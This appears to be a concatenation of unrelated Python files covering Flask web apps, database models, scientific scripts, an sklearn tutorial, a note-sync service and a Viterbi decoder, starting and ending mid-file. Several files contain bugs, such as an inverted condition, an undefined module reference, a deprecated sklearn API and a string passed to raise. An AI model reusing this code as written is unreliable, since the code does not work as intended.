"price_paid": self.price_paid,
"memo": self.memo,
"date_ordered": str(self.date_ordered),
"date_delivered_projected": str(self.date_delivered_projected),
"date_delivered": self.date_delivered,
"order_taker": order_taker,
"order_fulfiller": order_fulfiller,
"completed": self.completed,
"shop_order_items": shop_order_items,
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for shop_order
"""
current_time_utc = datetime.datetime.now(datetime.timezone.utc)
# one week ahead for projected delivery date
week_forward = current_time_utc + datetime.timedelta(days=7)
# order placed and paid
database.session.add(
Shop_order(
1,
40614.00,
True,
"test 1",
current_time_utc,
week_forward,
None,
1,
None,
False
)
)
# order placed and not paid
database.session.add(
Shop_order(
2,
7928.00,
False,
"test 2",
current_time_utc,
week_forward,
None,
1,
None,
False
)
)
# order placed, paid and delivered
database.session.add(
Shop_order(
3,
400400.00,
True,
"",
current_time_utc,
week_forward,
week_forward,
1,
2,
True,
)
)
database.session.commit()
class Shop_order_item(DB.Model):
"""
shop_order_item database table definition
"""
shop_order = DB.Column(
DB.Integer, DB.ForeignKey("shop_order.id"), primary_key=True, nullable=False
)
company_product = DB.Column(
DB.Integer,
DB.ForeignKey("company_product.id"),
primary_key=True,
nullable=False,
)
quantity_units = DB.Column(DB.Integer, nullable=False)
def __init__(self, order, company, units):
self.shop_order = order
self.company_product = company
self.quantity_units = units
def request_shop_order_item_info(self, database):
"""
produces a dictionary of all relevant shop_order_item information
"""
company_product = shop_order_items_query = (
database.session.query(Company_product)
.filter(Company_product.id == self.company_product)
.all()[0]
.request_company_product_info(database)
)
return {
"company_product": company_product,
"quantity_units": self.quantity_units,
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for shop_order_items
"""
database.session.add(Shop_order_item(1, 2, 6))
database.session.add(Shop_order_item(1, 7, 2))
database.session.add(Shop_order_item(1, 6, 100))
database.session.add(Shop_order_item(1, 5, 3))
database.session.add(Shop_order_item(2, 1, 200))
database.session.add(Shop_order_item(2, 4, 100))
database.session.add(Shop_order_item(2, 8, 600))
database.session.add(Shop_order_item(3, 7, 20))
database.session.add(Shop_order_item(3, 3, 10))
database.session.add(Shop_order_item(3, 6, 10000))
database.session.commit()
class Order_taker_goal(DB.Model):
"""
order_taker_goal database table definition
"""
order_taker = DB.Column(
DB.Integer, DB.ForeignKey("sys_user.id"), primary_key=True, nullable=False
)
month = DB.Column(DB.Integer, primary_key=True, nullable=False)
year = DB.Column(DB.Integer, primary_key=True, nullable=False)
goal_value = DB.Column(DB.Numeric(10, 2), nullable=False)
def __init__(self, taker, month, year, value):
self.order_taker = taker
self.month = month
self.year = year
self.goal_value = value
def request_order_taker_goal_info(self):
"""
produces a dictionary of all relevant order_taker_goal information
"""
return {
"order_taker": self.order_taker,
"month": self.month,
"year": self.year,
"goal_value": self.goal_value
}
@staticmethod
def bootstrap_populate(database):
"""
database bootstrap function for order_taker_goal
"""
database.session.add(Order_taker_goal(1, 11, 2020, 20000.00))
database.session.add(Order_taker_goal(1, 12, 2020, 15000.00))
database.session.add(Order_taker_goal(4, 11, 2020, 10000.00))
database.session.add(Order_taker_goal(4, 12, 2020, 11000.00))
database.session.add(Order_taker_goal(7, 11, 2020, 12000.00))
database.session.add(Order_taker_goal(7, 12, 2020, 13000.00))
database.session.commit()
def database_bootstrap(database):
"""
this function populates all tables with mock testing data
"""
Sys_user_role.bootstrap_populate(database)
Sys_user.bootstrap_populate(database)
Zone.bootstrap_populate(database)
Shop_category.bootstrap_populate(database)
Shop.bootstrap_populate(database)
Shop_zone.bootstrap_populate(database)
Company.bootstrap_populate(database)
Company_zone.bootstrap_populate(database)
Company_product.bootstrap_populate(database)
Shop_order.bootstrap_populate(database)
Shop_order_item.bootstrap_populate(database)
Order_taker_goal.bootstrap_populate(database)
database.session.close()
|
import os
import sys
import subprocess
import shutil
sys.path.insert(0, 'scripts')
sys.path.insert(0, os.path.join("tools", "families"))
import fam
import experiments as exp
def get_tree(ale_file):
for line in open(ale_file):
if (";" in line):
return line
return None
def export_ale_trees(input_trees_dir, datadir):
for f in os.listdir(input_trees_dir):
family = f.replace("fix_", "").replace("_c60_lg_combined.ale", "")
family = family + "_bmge30_renamed"
output_tree = fam.build_gene_tree_path(datadir, "c60", family, "ale")
ale_file = os.path.join(input_trees_dir, f)
tree_string = get_tree(ale_file)
ok = True
if (tree_string):
print("Not tree for " + family)
try:
with open(output_tree, "w") as writer:
writer.write(tree_string)
except:
ok = False
if (not ok):
print("Error with family " + family)
if (__name__ == "__main__"):
if (len(sys.argv) != 3):
print("syntax: input_trees_dir datadir")
exit(1)
input_trees_dir = sys.argv[1]
datadir = sys.argv[2]
export_ale_trees(input_trees_dir, datadir)
|
import json
from datetime import datetime, timezone
import requests
from bson import ObjectId
from flask import render_template, flash, redirect, url_for, request, Response
from flask_login import current_user, login_user, logout_user, login_required
from werkzeug.urls import url_parse
from app import app
from app.forms import LoginForm, RegistrationForm, NewProjectForm, NewTestForm
from app.models import User, Test, Project, ProjectRoles
@app.route('/')
@app.route('/index', methods=['GET', 'POST'])
@login_required
def index():
projects = Project.objects().all()
form = NewProjectForm()
if request.method == 'POST' and form.validate_on_submit():
project = Project(
name=form.name.data,
influx_addr=form.influx_addr.data,
influx_port=form.influx_port.data,
influx_db=form.influx_db.data
)
roles = ProjectRoles(admins=[current_user.get_id()])
project.users = roles
project.save()
flash('Congratulations, you created new project!')
return render_template('index.html', title='Home', projects=projects, form=form)
@app.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegistrationForm()
if form.validate_on_submit():
user = User(name=form.username.data, email=form.email.data)
user.set_password(form.password.data)
user.save()
flash('Congratulations, you are now a registered user!')
return redirect(url_for('login'))
return render_template('register.html', title='Sign In', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.objects(name=form.username.data).first_or_404()
if user is None:
return redirect(url_for('register'))
elif not user.check_password(form.password.data):
flash('Invalid username or password')
return redirect(url_for('login'))
login_user(user, remember=form.remember_me.data)
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
pass
return redirect(url_for('index'))
return render_template('login.html', title='Login In', form=form)
@app.route('/logout', methods=['GET'])
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
@app.route('/user/<name>')
@login_required
def user(name):
user = User.objects(name=name).first_or_404()
return render_template('user.html', user=user)
def utc_to_local(utc_dt):
return utc_dt.replace(tzinfo=timezone.utc).astimezone(tz=None)
@app.route('/project/<name>', methods=['GET', 'POST'])
@login_required
def project(name):
form = NewTestForm()
project = Project.objects(name=name).first_or_404()
tests = Test.objects(project=ObjectId(project.get_id()))
if request.method == 'POST' and form.validate_on_submit():
test_json = json.loads(form.json.data)
test = Test(
name=test_json["name"],
start=test_json["start"],
testplan=test_json["testplan"],
end=test_json["end"],
tz=test_json["tz"],
rump_up=test_json["rump_up"],
)
test.user_id = ObjectId(current_user.get_id())
test.project = ObjectId(project.get_id())
test.save()
flash("Test \"" + test.name + "\" created!")
return redirect(url_for('project'))
return render_template('project.html', title=project.name, project=project, tests=tests, form=form)
@app.route('/test/<hid>')
@login_required
def test(hid):
test = Test.objects(hid=hid).first_or_404()
test_data = {
"influx_addr": test.project.influx_addr,
"influx_port": test.project.influx_port,
"influx_db": test.project.influx_db,
"testplan": test.testplan,
"start": datetime.strftime(test.start.replace(tzinfo=timezone.utc).astimezone(tz=None), '%Y-%m-%d %H:%M:%S'),
"end": datetime.strftime(test.end.replace(tzinfo=timezone.utc).astimezone(tz=None), '%Y-%m-%d %H:%M:%S'),
"tz": str(test.tz),
"rump_up": test.rump_up
}
resp = requests.request(
method='POST',
url='http://localhost:5000/api/1.0/getSummary',
headers={"Content-Type": "application/json"},
data=json.dumps(test_data)
)
response = Response(resp.content, resp.status_code)
# summary = json.loads(json.loads(response.data)['summary'])
# aggr = json.loads(json.loads(response.data)['aggregated'])
data = json.loads(json.loads(response.data))
return render_template('test.html', title=test.name, test=test, data=data)
|
# -*- coding: utf-8 -*-
"""The app module, containing the app factory function."""
import logging
import traceback
import sentry_sdk
from animal_case import animalify
from flask import Flask, Response, jsonify, request, current_app, g
from flask_cors import CORS
from flask_security import SQLAlchemyUserDatastore
from flask_sslify import SSLify
from sentry_sdk.integrations.flask import FlaskIntegration
from sentry_sdk.integrations.logging import LoggingIntegration
from grant import (
commands,
proposal,
user,
ccr,
comment,
milestone,
admin,
email,
task,
rfp,
e2e,
home
)
from grant.extensions import bcrypt, migrate, db, ma, security, limiter
from grant.settings import SENTRY_RELEASE, ENV, E2E_TESTING, DEBUG, CORS_DOMAINS
from grant.utils.auth import AuthException, handle_auth_error, get_authed_user
from grant.utils.exceptions import ValidationException
class JSONResponse(Response):
@classmethod
def force_type(cls, rv, environ=None):
if isinstance(rv, dict) or isinstance(rv, list) or isinstance(rv, tuple):
rv = jsonify(animalify(rv))
elif rv is None:
rv = jsonify(data=None), 204
return super(JSONResponse, cls).force_type(rv, environ)
def create_app(config_objects=["grant.settings"]):
from grant.patches import patch_werkzeug_set_samesite
patch_werkzeug_set_samesite()
app = Flask(__name__.split(".")[0])
app.response_class = JSONResponse
@app.after_request
def send_emails(response):
if 'email_sender' in g:
# starting email sender
g.email_sender.start()
return response
# Return validation errors
@app.errorhandler(ValidationException)
def handle_validation_error(err):
return jsonify({"message": str(err)}), 400
@app.errorhandler(422)
@app.errorhandler(400)
def handle_error(err):
headers = err.data.get("headers", None)
messages = err.data.get("messages", "Invalid request.")
error_message = "Something was wrong with your request"
if type(messages) == dict:
if 'json' in messages:
error_message = messages['json'][0]
else:
current_app.logger.warn(
f"Unexpected error occurred: {messages}"
)
if headers:
return jsonify({"message": error_message}), err.code, headers
else:
return jsonify({"message": error_message}), err.code
@app.errorhandler(404)
def handle_notfound_error(err):
error_message = "Unknown route '{} {}'".format(request.method, request.path)
return jsonify({"message": error_message}), 404
@app.errorhandler(429)
def handle_limit_error(err):
app.logger.warn(f'Rate limited request to {request.method} {request.path} from ip {request.remote_addr}')
return jsonify({"message": "You’ve done that too many times, please wait and try again later"}), 429
@app.errorhandler(Exception)
def handle_exception(err):
sentry_sdk.capture_exception(err)
app.logger.debug(traceback.format_exc())
app.logger.debug("Uncaught exception at {} {}, see above for traceback".format(request.method, request.path))
return jsonify({"message": "Something went wrong"}), 500
for conf in config_objects:
app.config.from_object(conf)
app.url_map.strict_slashes = False
register_extensions(app)
register_blueprints(app)
register_shellcontext(app)
register_commands(app)
if not (app.config.get("TESTING") or E2E_TESTING):
sentry_logging = LoggingIntegration(
level=logging.INFO,
event_level=logging.ERROR
)
sentry_sdk.init(
environment=ENV,
release=SENTRY_RELEASE,
integrations=[FlaskIntegration(), sentry_logging]
)
# handle all AuthExceptions thusly
# NOTE: testing mode does not honor this handler, and instead returns the generic 500 response
app.register_error_handler(AuthException, handle_auth_error)
@app.after_request
def grantio_authed(response):
response.headers["X-Grantio-Authed"] = 'yes' if get_authed_user() else 'no'
return response
return app
def register_extensions(app):
"""Register Flask extensions."""
bcrypt.init_app(app)
db.init_app(app)
migrate.init_app(app, db)
ma.init_app(app)
limiter.init_app(app)
user_datastore = SQLAlchemyUserDatastore(db, user.models.User, user.models.Role)
security.init_app(app, datastore=user_datastore, register_blueprint=False)
# supports_credentials for session cookies, on cookie domains (if set)
origins = CORS_DOMAINS.split(',')
CORS(app, supports_credentials=True, expose_headers='X-Grantio-Authed', origins=origins)
SSLify(app)
return None
def register_blueprints(app):
"""Register Flask blueprints."""
app.register_blueprint(ccr.views.blueprint)
app.register_blueprint(comment.views.blueprint)
app.register_blueprint(proposal.views.blueprint)
app.register_blueprint(user.views.blueprint)
app.register_blueprint(milestone.views.blueprint)
app.register_blueprint(admin.views.blueprint)
app.register_blueprint(email.views.blueprint)
app.register_blueprint(task.views.blueprint)
app.register_blueprint(rfp.views.blueprint)
app.register_blueprint(home.views.blueprint)
if E2E_TESTING and DEBUG:
print('Warning: e2e end-points are open, this should only be the case for development or testing')
app.register_blueprint(e2e.views.blueprint)
def register_shellcontext(app):
"""Register shell context objects."""
def shell_context():
"""Shell context objects."""
return {"db": db}
app.shell_context_processor(shell_context)
def register_commands(app):
"""Register Click commands."""
app.cli.add_command(commands.test)
app.cli.add_command(commands.lint)
app.cli.add_command(commands.clean)
app.cli.add_command(commands.urls)
app.cli.add_command(commands.reset_db_chain_data)
app.cli.add_command(proposal.commands.create_proposal)
app.cli.add_command(proposal.commands.create_proposals)
app.cli.add_command(proposal.commands.retire_v1_proposals)
app.cli.add_command(user.commands.set_admin)
app.cli.add_command(user.commands.mangle_users)
app.cli.add_command(task.commands.create_task)
|
import caffe
import numpy as np
import argparse, pprint
class TryLayer(caffe.Layer):
@classmethod
def parse_args(cls, argsStr):
parser = argparse.ArgumentParser(description='Try Layer')
parser.add_argument('--num_classes', default=20, type=int)
parser.add_argument('--aa', default=5, type=int)
args = parser.parse_args(argsStr.split())
print('Using Config:')
pprint.pprint(args)
return args
def setup(self, bottom, top):
self.params_ = TryLayer.parse_args(self.param_str)
top[0].reshape(2,2)
def forward(self, bottom, top):
top[0].data[...] = top[0].data + self.params_.aa * np.ones(top[0].shape)
def backward(self, top, propagate_down, bottom):
""" This layer has no backward """
pass
def reshape(self, bottom, top):
""" This layer has no reshape """
pass
|
import numpy as np
import pandas as pd
from tensorflow import keras
import csv
from tensorflow.keras import layers
from matplotlib import pyplot as plt
import os
from datetime import datetime
# timestamp,Ttl Volume,Avg Volume,Ttl Through,Ttl Left Turn,Ttl Right Turn,Ttl Wrong Way,Overall Avg Speed, Zone 2, Zone 3, Zone 4, Zone 5, Zone 2.1, Zone 3.1, Zone 4.1, Zone 5.1,Class 1: 0-22ft,Class 2: 22-36ft,Class 3: 36-Up, , .1, 04 Eb Through #1, 04 Eb Through #3, 07 Eb Left Turn #1, 07 Eb Left Turn #2, 04 Eb Through #1.1, 04 Eb Through #3.1, 07 Eb Left Turn #1.1, 07 Eb Left Turn #2.1
root_dir = "C:\\Users\\Mark Fuller\\Desktop\\Senior\\DM\\traffic\\resources\\RawData\\"
print("Loading Data")
root_dirs = os.listdir(root_dir)
root_dirs = list(filter(lambda x: ("csv" in x), root_dirs))
print(str(root_dirs))
files = []
for year_dir in root_dirs:
full_path = root_dir + year_dir
print("Full_path: ", str(full_path))
csvs = os.listdir(full_path)
full_file_paths = list(map(lambda c: (os.path.join(full_path, c)), csvs))
files = files + full_file_paths
files = list(filter(lambda f: (".ProcData.csv" in f), files))
print("source files: ", str(files))
# combine all files in the list
combined_csv = pd.concat([pd.read_csv(f) for f in files])
removed_headers = combined_csv.values.tolist()[1:]
removed_headers_sorted = sorted(removed_headers, key=lambda row: datetime.strptime(row[0], "%m/%d/%Y %H:%M"))
# #sort 07/27/2020 20:00
# combined_csv = combined_csv
# combined_csv = sorted(combined_csv, key = lambda row: datetime.strptime(row[0], "%m/%d/%Y %H:%M"))
# export to csv
combined_csv = pd.DataFrame(removed_headers_sorted, index=None, columns=combined_csv.columns)
combined_csv.to_csv("combined_csv.csv", index=False)
data = []
#
# for file in files:
# with open(file) as f:
# reader = csv.reader(f)
#
# #Skip the header of the csv
# next(reader)
# print(file)
# print(list(reader)[:5])
# data = data + list(reader)
# #print(file + " \t" + str(reader.line_num))
print(len(data), " lines total")
print("Data Loaded")
print("Data restructuring")
print("Data restructured")
#
#
#
# fig, ax = plt.subplots()
# df_small_noise.plot(legend=False, ax=ax)
# plt.show()
|
import numpy as np
from sklearn import cross_validation
from sklearn import datasets
from sklearn import svm
# load test data
iris = datasets.load_iris()
# split data in train set and test set
X_train, X_test, y_train, y_test = cross_validation.train_test_split(
iris.data, iris.target, test_size=0.4, random_state=0
)
# use svm
clf = svm.SVC(kernel='linear', C=1).fit(X_train, y_train)
clf.score(X_test, y_test)
# cross validation
clf = svm.SVC(kernel='linear', C=1)
# cv : 分割数据集份数,
scores = cross_validation.cross_val_score(clf, iris.data, iris.target, cv=5)
# 可以以此计算此分类器的均值方差,比较分类器之间的表现
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
# scoring : 分类器评分标准 String类型
scores = cross_validation.cross_val_score(clf, iris.data, iris.target, cv=5, scoring='f1_weighted')
# 也可以交叉验证得到预测值
predicted = cross_validation.cross_val_predict(clf, iris.data, iris.target, cv=10)
metrics.accuracy_score(iris.target, predicted)
# 交叉验证迭代器
# KFold类
# n : 元素总数
# n_folds : 交叉验证数量,当n_folds=n时,为留一法 Leave-One-Out
# shuffle : 是否随机打乱
kf = cross_validation.KFold(4, n_folds=4)
for train, test in kf:
print("%s %s" % (train, test))
# 留一法
# LeaveOneOut类
loo = cross_validation.LeaveOneOut(4)
for train, test in loo:
print("%s %s" % (train, test))
|
#!/usr/bin/env python
# coding: utf-8
import sys
import tkinter as tk
from tkinter.filedialog import askopenfilename
sys.path.append(".")
import spam
def handl_quit():
spam.quit()
fenetre.destroy()
def handl_run():
filename = askopenfilename()
spam.run(filename)
fenetre = tk.Tk()
greeting = tk.Label(text="Hello, Tkinter")
greeting.pack()
run_button = tk.Button(text="run", fg="black",command=handl_run)
run_button.pack( side = tk.LEFT)
replay_button = tk.Button(text="replay", fg="black",command=spam.replay)
replay_button.pack( side = tk.LEFT)
play_button = tk.Button(text="play", fg="black",command=spam.play)
play_button.pack( side = tk.LEFT)
pause_button = tk.Button(text="pause", fg="black",command=spam.pause)
pause_button.pack( side = tk.LEFT)
accelerate1x_button = tk.Button(text="1x", fg="black",command=spam.accelerate1x)
accelerate1x_button.pack( side = tk.LEFT)
accelerate2x_button = tk.Button(text="2x", fg="black",command=spam.accelerate2x)
accelerate2x_button.pack( side = tk.LEFT)
fenetre.protocol("WM_DELETE_WINDOW", handl_quit)
fenetre.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Run a test calculation on localhost.
Usage: ./example_01.py
"""
from os import path
import click
from aiida import cmdline, engine
from aiida.plugins import CalculationFactory
from aiida_spirit import helpers
from aiida_spirit.helpers import prepare_test_inputs
INPUT_DIR = path.join(path.dirname(path.realpath(__file__)), 'input_files')
def test_run(spirit_code):
"""Run a calculation on the localhost computer.
Uses test helpers to create AiiDA Code on the fly.
"""
if not spirit_code:
# get code
computer = helpers.get_computer()
spirit_code = helpers.get_code(entry_point='spirit', computer=computer)
inputs = prepare_test_inputs(INPUT_DIR)
# add the spirit code to the inputs
inputs['code'] = spirit_code
# Note: in order to submit your calculation to the aiida daemon, do:
# from aiida.engine import submit
# future = submit(CalculationFactory('spirit'), **inputs)
result = engine.run(CalculationFactory('spirit'), **inputs)
#computed_diff = result['spirit'].get_content()
print(f'Computed result: {result}')
@click.command()
@cmdline.utils.decorators.with_dbenv()
@cmdline.params.options.CODE()
def cli(code):
"""Run example.
Example usage: $ ./example_01.py --code diff@localhost
Alternative (creates diff@localhost-test code): $ ./example_01.py
Help: $ ./example_01.py --help
"""
test_run(code)
if __name__ == '__main__':
cli() # pylint: disable=no-value-for-parameter
|
'''
Created on Sep 10, 2010
@author: xnaud
'''
import threading
import logging
from model import modelDAO
from model.model import Note, Notebook, Tag
from service import apiService
from config import config
_BATCH_SIZE_=10
_logger=logging.getLogger(__name__)
# Thread status
STATUS_RUNNING=1
STATUS_IDLE=0
# Request Type
SYNCHRONIZE=1
TERMINATE=2
#class SyncEvent(threading.Event):
# _type=None
#
# def __init__(self, type=SYNCHRONIZE, *args, **kwargs):
# super(SyncRequestEvent, self).__init__(*args, **kwargs)
# self._type=type
class SyncThread(threading.Thread):
_sync_service=None
_sync_request=None
_sync_complete_callback=None
_sync_progress_callback=None
_quit=False
status = STATUS_IDLE
def __init__(self, session_cls, user, password, sync_complete_callback=None, sync_progress_callback=None ):
super(SyncThread, self).__init__()
self._logger = logging.getLogger(__name__)
# wire the entire set of objects with sqlite object bound to this thread. Silly!!
self._session = session_cls()
dao = modelDAO.ModelDAO(self._session)
api = apiService.ApiService(config.configuration, user, password)
self._sync_service = SyncService(dao, api)
# TODO: deal with the progress callback
self._sync_progress_callback = sync_progress_callback
self._sync_complete_callback = sync_complete_callback
# event used to block till the event occurs. Avoid polling or a timer
self._event = threading.Event()
def run(self):
actions = { SYNCHRONIZE: self._perform_sync, TERMINATE: self._perform_quit }
while not self._quit:
self._event.wait()
_logger.debug('thread %s: event triggered:%s' % (self.name, self._sync_request) )
action = actions.get(self._sync_request, None)
if action:
action()
self._event.clear()
#gobject.idle_add(self.update_label, counter)
# _logger.debug('thread %s sleeping' % self.name )
# time.sleep(10)
# _logger.debug('thread %s waking up' % self.name)
_logger.debug('thread %s exiting' % self.name )
##########################
# perform methods are executed by the sync thread
def _perform_sync(self):
#self._sync_service.sync()
if self._sync_complete_callback:
self._sync_complete_callback()
def _perform_quit(self):
self._quit=True
#############################
# request methods are executed by non sync thread to request the sync thread to perform some tasks
def request_sync(self):
_logger.debug('Sync requested')
self._sync_request=SYNCHRONIZE
self._event.set()
def request_quit(self):
self._sync_request=TERMINATE
self._event.set()
class SyncService(object):
# init of the logger is in the init to make sure the logger config is loaded first
_logger=None
_dao = None
_api_service = None
_notebook_mapping = { 'name':'name', 'updated':'serviceUpdated', 'created': 'serviceCreated', 'guid':'guid',
# not supported yet
# 'updateSequenceNum':None, 'published':None,
# 'defaultNotebook':None,
# 'publishing':None,
}
_note_mapping = { 'active': 'active', 'content':'content', 'created':'created', 'updated':'updated',
'guid': 'guid', 'title':'title',
#'deleted':None,
#'contentHash':None, 'notebookGuid': 'notebook', 'resources': None, 'tagGuids':'tags',
}
_tag_mapping = { 'guid' : 'guid', 'name':'name' ,
}
def __init__(self, dao, api):
self._dao = dao
self._api_service = api
def _sync_notes(self, notes):
_logger.debug("Synching notes")
conflict=[]
for note in notes:
# get the note from the local cache
cached_note = self._dao.get_note_by_guid(note.guid)
# is cached_note is dirty (i.e. it has been changed locally
# then we have a conflict
if cached_note and cached_note.is_dirty:
_logger.warning("Note %s conflict. Manual merge required" % cached_note)
conflict.append(cached_note)
else:
# the content is separate
content = self._api_service.get_note_content(note.guid)
cached_note = self._dao.create_update_note(cached_note, **self._convert_to_properties(self._note_mapping, note) )
cached_note.content = unicode(content)
# deal with relationships to notebook and to tags
cached_note.notebook = self._dao.get_notebook_by_guid(note.notebookGuid)
if note.tagGuids:
for guid in note.tagGuids:
tag = self._dao.create_update_tag_by_name_or_guid(guid, guid, is_dirty=False)
cached_note.tags.append(tag)
# reset the dirty flag
cached_note.is_dirty=False
_logger.debug("Synching notes done!")
return conflict
def _convert_to_properties(self, mapping, object):
remote_props = object.__dict__
result = {}
for prop,remote_prop in mapping.iteritems():
result[prop] = remote_props[remote_prop]
return result
def _sync_notebooks(self, notebooks):
_logger.debug("Synching notebooks")
conflict=[]
for notebook in notebooks:
# get the notebook from the local cache
cached_notebook = self._dao.get_notebook_by_guid(notebook.guid)
# if cached_note is dirty (i.e. it has been changed locally
# then we have a conflict
if cached_notebook and cached_notebook.is_dirty:
_logger.warning("Notebook %s conflict. Manual merge required" % cached_notebook)
conflict.append(cached_notebook)
else:
cached_notebook = self._dao.create_update_notebook(cached_notebook,
**self._convert_to_properties(self._notebook_mapping, notebook) )
cached_notebook.is_dirty=False
_logger.debug("Synching notebooks done!")
return conflict
def _sync_tags(self, tags):
_logger.debug("Synching tags")
conflict=[]
for tag in tags:
# get the notebook from the local cache
cached_tag = self._dao.get_tag_by_guid(tag.guid)
if not cached_tag:
# try to look by name
cached_tag = self._dao.get_tag_by_name(tag.name)
# if cached_tag is dirty (i.e. it has been changed locally
# then we have a conflict
if cached_tag and cached_tag.is_dirty:
_logger.warning("Tag %s conflict. Manual merge required" % cached_tag)
conflict.append(cached_tag)
else:
cached_tag = self._dao.create_update_tag(cached_tag,
**self._convert_to_properties(self._tag_mapping, tag) )
cached_tag.is_dirty=False
_logger.debug("Synching tags done!")
return conflict
def _sync(self, count_start, sync_state):
delete_tag=[]
create_tag=[]
delete_note=[]
create_note=[]
delete_notebook=[]
create_notebook=[]
delete_resource=[]
create_resource=[]
count=count_start
# no changes on the server?
if count == sync_state.updateCount:
return count
# build a list of changes / deletion...
while True:
# get the first or notext chunk
chunk = self._api_service.get_sync_chunk(count, _BATCH_SIZE_,True)
# store the various info of the chunk
create_tag.extend(chunk.tags or [])
create_notebook.extend(chunk.notebooks or [])
create_note.extend(chunk.notes or [])
create_resource.extend(chunk.resources or [])
delete_tag.extend(chunk.expungedTags or [])
delete_notebook.extend(chunk.expungedNotebooks or [])
delete_note.extend(chunk.expungedNotes or [])
#delete_resource.extend(chunk.expungedResources or [])
count = chunk.updateCount
# exit condition: are we done getting all the chunks?
if count >= chunk.chunkHighUSN:
break
# start the synching
self._sync_notebooks(create_notebook)
self._sync_tags(create_tag)
self._sync_notes(create_note)
self._dao.delete_objects(Tag, Tag.guid, delete_tag)
self._dao.delete_objects(Notebook, Notebook.guid, delete_notebook)
self._dao.delete_objects(Note, Note.guid, delete_note)
# TODO send the changes
return count
'''
_send_changes
send all local changes to the remote server
'''
def _send_changes(self):
notebooks = self._dao.get_dirty_objects(Notebook)
tags = self._dao.get_dirty_objects(Tag)
notes = self._dao.get_dirty_objects(Note)
def sync(self, full=False):
sync_state = self._api_service.get_sync_state()
last_sync = self._dao.get_or_create_last_sync()
# check if full sync required
if full or sync_state.fullSyncBefore > last_sync.last_sync_time:
#full sync, start from state 0
count_start=0
full=True
else:
count_start = last_sync.last_update_count
count = self._sync(count_start, sync_state)
# same count, no change on server side
#if last_sync.last_update_count==sync_state.updateCount:
self._send_changes()
# update the last count
self._dao.update_last_sync(count)
|
import torch
import math
from typing import List, Tuple, Dict
def logsumexp(tensor: torch.Tensor, dim: int = -1, keepdim: bool = False) -> torch.Tensor:
"""
A numerically stable computation of logsumexp. This is mathematically equivalent to
`tensor.exp().sum(dim, keep=keepdim).log()`. This function is typically used for summing log
probabilities.
Parameters
----------
tensor : torch.FloatTensor, required.
A tensor of arbitrary size.
dim : int, optional (default = -1)
The dimension of the tensor to apply the logsumexp to.
keepdim: bool, optional (default = False)
Whether to retain a dimension of size one at the dimension we reduce over.
"""
max_score, _ = tensor.max(dim, keepdim=keepdim)
if keepdim:
stable_vec = tensor - max_score
else:
stable_vec = tensor - max_score.unsqueeze(dim)
return max_score + (stable_vec.exp().sum(dim, keepdim=keepdim)).log()
def viterbi_decode(
tag_sequence: torch.Tensor,
transition_matrix: torch.Tensor,
tag_observations = None,
allowed_start_transitions: torch.Tensor = None,
allowed_end_transitions: torch.Tensor = None,
top_k: int = None,
):
"""
Perform Viterbi decoding in log space over a sequence given a transition matrix
specifying pairwise (transition) potentials between tags and a matrix of shape
(sequence_length, num_tags) specifying unary potentials for possible tags per
timestep.
Parameters
----------
tag_sequence : torch.Tensor, required.
A tensor of shape (sequence_length, num_tags) representing scores for
a set of tags over a given sequence.
transition_matrix : torch.Tensor, required.
A tensor of shape (num_tags, num_tags) representing the binary potentials
for transitioning between a given pair of tags.
tag_observations : Optional[List[int]], optional, (default = None)
A list of length ``sequence_length`` containing the class ids of observed
elements in the sequence, with unobserved elements being set to -1. Note that
it is possible to provide evidence which results in degenerate labelings if
the sequences of tags you provide as evidence cannot transition between each
other, or those transitions are extremely unlikely. In this situation we log a
warning, but the responsibility for providing self-consistent evidence ultimately
lies with the user.
allowed_start_transitions : torch.Tensor, optional, (default = None)
An optional tensor of shape (num_tags,) describing which tags the START token
may transition *to*. If provided, additional transition constraints will be used for
determining the start element of the sequence.
allowed_end_transitions : torch.Tensor, optional, (default = None)
An optional tensor of shape (num_tags,) describing which tags may transition *to* the
end tag. If provided, additional transition constraints will be used for determining
the end element of the sequence.
top_k : int, optional, (default = None)
Optional integer specifying how many of the top paths to return. For top_k>=1, returns
a tuple of two lists: top_k_paths, top_k_scores, For top_k==None, returns a flattened
tuple with just the top path and its score (not in lists, for backwards compatibility).
Returns
-------
viterbi_path : List[int]
The tag indices of the maximum likelihood tag sequence.
viterbi_score : torch.Tensor
The score of the viterbi path.
"""
if top_k is None:
top_k = 1
flatten_output = True
elif top_k >= 1:
flatten_output = False
else:
raise ValueError(f"top_k must be either None or an integer >=1. Instead received {top_k}")
sequence_length, num_tags = list(tag_sequence.size())
has_start_end_restrictions = (
allowed_end_transitions is not None or allowed_start_transitions is not None
)
if has_start_end_restrictions:
if allowed_end_transitions is None:
allowed_end_transitions = torch.zeros(num_tags)
if allowed_start_transitions is None:
allowed_start_transitions = torch.zeros(num_tags)
num_tags = num_tags + 2
new_transition_matrix = torch.zeros(num_tags, num_tags)
new_transition_matrix[:-2, :-2] = transition_matrix
# Start and end transitions are fully defined, but cannot transition between each other.
allowed_start_transitions = torch.cat(
[allowed_start_transitions, torch.tensor([-math.inf, -math.inf])]
)
allowed_end_transitions = torch.cat(
[allowed_end_transitions, torch.tensor([-math.inf, -math.inf])]
)
# First define how we may transition FROM the start and end tags.
new_transition_matrix[-2, :] = allowed_start_transitions
# We cannot transition from the end tag to any tag.
new_transition_matrix[-1, :] = -math.inf
new_transition_matrix[:, -1] = allowed_end_transitions
# We cannot transition to the start tag from any tag.
new_transition_matrix[:, -2] = -math.inf
transition_matrix = new_transition_matrix
if tag_observations:
if len(tag_observations) != sequence_length:
raise (
"Observations were provided, but they were not the same length "
"as the sequence. Found sequence of length: {} and evidence: {}".format(
sequence_length, tag_observations
)
)
else:
tag_observations = [-1 for _ in range(sequence_length)]
if has_start_end_restrictions:
tag_observations = [num_tags - 2] + tag_observations + [num_tags - 1]
zero_sentinel = torch.zeros(1, num_tags)
extra_tags_sentinel = torch.ones(sequence_length, 2) * -math.inf
tag_sequence = torch.cat([tag_sequence, extra_tags_sentinel], -1)
